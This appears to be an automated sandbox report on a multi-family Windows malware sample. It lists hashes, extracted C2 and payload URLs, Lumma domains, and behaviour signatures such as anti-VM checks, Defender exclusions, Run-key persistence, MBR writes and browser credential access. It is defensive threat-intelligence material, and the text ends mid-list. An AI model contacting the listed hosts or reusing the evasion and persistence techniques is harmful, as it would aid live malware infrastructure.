Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
07/04/2025, 10:09
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
23573a8db4c1b7f45d67aa96325236dd
-
SHA1
f874c2a1450e1455e616282f4da3b2ff715967b0
-
SHA256
2455cf14f9efe4b234215f89b672996d04d219d87a1d73aa1eb4fd497510f3e5
-
SHA512
4bcbfc053d8c96233234b29ac9e237f6e9eb3dfd767de4d747323ee42a0cbfbef670270562741106cc4f3480e6ae695466e9f5d5316aea80e2de13d5ce841e43
-
SSDEEP
24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8a0fu:aTvC/MTQYxsWR7a0f
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://advennture.top/GKsiio
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Signatures
-
Amadey family
-
Lumma family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 10f280b706.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 72795d1f06.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 20 3636 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1424 powershell.exe 3636 powershell.exe -
Downloads MZ/PE file 13 IoCs
flow pid Process 313 1776 MSBuild.exe 359 1776 MSBuild.exe 307 2780 svchost.exe 30 848 rapes.exe 67 1776 MSBuild.exe 95 1776 MSBuild.exe 212 1776 MSBuild.exe 369 1776 MSBuild.exe 390 1776 MSBuild.exe 20 3636 powershell.exe 34 848 rapes.exe 157 1776 MSBuild.exe 305 1776 MSBuild.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\Drivers\9c4d2b28.sys dfe9b371.exe File created C:\Windows\System32\Drivers\klupd_9c4d2b28a_arkmon.sys dfe9b371.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9c4d2b28\ImagePath = "System32\\Drivers\\9c4d2b28.sys" dfe9b371.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9c4d2b28a_arkmon\ImagePath = "System32\\Drivers\\klupd_9c4d2b28a_arkmon.sys" dfe9b371.exe -
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5716 msedge.exe 1416 msedge.exe 1560 chrome.exe 1100 chrome.exe 5196 chrome.exe 5708 msedge.exe 5732 msedge.exe 1756 chrome.exe 4008 chrome.exe 6044 msedge.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 72795d1f06.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 10f280b706.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 72795d1f06.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 10f280b706.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation rapes.exe -
Deletes itself 1 IoCs
pid Process 5520 w32tm.exe -
Executes dropped EXE 36 IoCs
pid Process 436 TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE 848 rapes.exe 2912 ibC8xs1.exe 1272 exp.exe 2836 DgQBvwg.exe 4616 exp.exe 1008 steamerrorreporter.exe 4420 steamerrorreporter.exe 4688 5LlBAvp.exe 5816 YSdglTu.exe 2256 YSdglTu.exe 6116 rapes.exe 4952 Pgpx359.exe 6028 e9ff9c3a5a.exe 1196 a31e3b2417.exe 5428 10f280b706.exe 6096 Pgpx359.exe 5588 YSdglTu.exe 392 YSdglTu.exe 5728 5LlBAvp.exe 4584 ibC8xs1.exe 3088 exp.exe 5556 DgQBvwg.exe 5692 exp.exe 5984 UZPt0hR.exe 6116 tzutil.exe 5520 w32tm.exe 13840 rapes.exe 14176 larBxd7.exe 6540 72795d1f06.exe 7116 9sWdA2p.exe 2732 steamerrorreporter.exe 9032 steamerrorreporter.exe 9280 65086ede.exe 5428 dfe9b371.exe 11044 AfkeY2q.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 10f280b706.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 72795d1f06.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9c4d2b28.sys dfe9b371.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9c4d2b28.sys\ = "Driver" dfe9b371.exe -
Loads dropped DLL 64 IoCs
pid Process 1008 steamerrorreporter.exe 1008 steamerrorreporter.exe 4420 steamerrorreporter.exe 4420 steamerrorreporter.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 2256 YSdglTu.exe 4084 remoteBggbv2.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 392 YSdglTu.exe 2732 steamerrorreporter.exe 2732 steamerrorreporter.exe 9032 steamerrorreporter.exe 9032 steamerrorreporter.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe 5428 dfe9b371.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts MSBuild.exe -
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\22673f59-a95e-41d9-b9a7-ef07a0444460 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{ad191732-16cd-4bbe-8b10-aeb710ea48c9}\\22673f59-a95e-41d9-b9a7-ef07a0444460.cmd\"" dfe9b371.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" ibC8xs1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" DgQBvwg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" ibC8xs1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe" DgQBvwg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 405 raw.githubusercontent.com 406 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 151 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 72795d1f06.exe File opened for modification \??\PhysicalDrive0 dfe9b371.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 436 TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE 848 rapes.exe 6116 rapes.exe 5428 10f280b706.exe 13840 rapes.exe 6540 72795d1f06.exe -
Suspicious use of SetThreadContext 27 IoCs
description pid Process procid_target PID 2912 set thread context of 1776 2912 ibC8xs1.exe 108 PID 1272 set thread context of 4248 1272 exp.exe 119 PID 1776 set thread context of 4500 1776 MSBuild.exe 124 PID 2836 set thread context of 4144 2836 DgQBvwg.exe 129 PID 1776 set thread context of 1700 1776 MSBuild.exe 132 PID 4616 set thread context of 3080 4616 exp.exe 146 PID 4688 set thread context of 3656 4688 5LlBAvp.exe 155 PID 1776 set thread context of 5924 1776 MSBuild.exe 157 PID 1776 set thread context of 5380 1776 MSBuild.exe 173 PID 1776 set thread context of 3816 1776 MSBuild.exe 178 PID 1776 set thread context of 440 1776 MSBuild.exe 182 PID 4420 set thread context of 5248 4420 steamerrorreporter.exe 180 PID 1776 set thread context of 5264 1776 MSBuild.exe 184 PID 1776 set thread context of 1732 1776 MSBuild.exe 189 PID 1776 set thread context of 2888 1776 MSBuild.exe 193 PID 1776 set thread context of 4244 1776 MSBuild.exe 196 PID 5728 set thread context of 4544 5728 5LlBAvp.exe 198 PID 4584 set thread context of 3704 4584 ibC8xs1.exe 203 PID 1776 set thread context of 1008 1776 MSBuild.exe 206 PID 3088 set thread context of 5864 3088 exp.exe 214 PID 5556 set thread context of 5528 5556 DgQBvwg.exe 218 PID 1776 set thread context of 5724 1776 MSBuild.exe 224 PID 5692 set thread context of 4920 5692 exp.exe 236 PID 1776 set thread context of 7884 1776 MSBuild.exe 244 PID 1776 set thread context of 6344 1776 MSBuild.exe 250 PID 1776 set thread context of 6824 1776 MSBuild.exe 252 PID 1776 set thread context of 8608 1776 MSBuild.exe 262 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 65086ede.exe File opened (read-only) \??\VBoxMiniRdrDN dfe9b371.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe MSBuild.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\Installer\e5869e0.msi msiexec.exe File opened for modification C:\Windows\Installer\e5869e0.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI6BF4.tmp msiexec.exe File created C:\Windows\Installer\e5869e4.msi msiexec.exe File created C:\Windows\Tasks\rapes.job TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{21A523FF-B931-41F7-BDB8-D9653E221476} msiexec.exe File opened for modification C:\Windows\Installer\MSIE96D.tmp msiexec.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000d000000023efb-625.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language steamerrorreporter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language steamerrorreporter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Pgpx359.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language larBxd7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9sWdA2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e9ff9c3a5a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AfkeY2q.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Pgpx359.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language steamerrorreporter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfe9b371.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72795d1f06.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 65086ede.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 10f280b706.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Checks processor information in registry 2 TTPs 22 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor MSBuild.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MSBuild.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier MSBuild.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies registry class 17 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rundll32.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2304 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1776 MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3636 powershell.exe 3636 powershell.exe 436 TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE 436 TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE 848 rapes.exe 848 rapes.exe 1272 exp.exe 1272 exp.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe 1776 MSBuild.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 5428 dfe9b371.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 4420 steamerrorreporter.exe 4420 steamerrorreporter.exe 5984 UZPt0hR.exe 5984 UZPt0hR.exe 5984 UZPt0hR.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
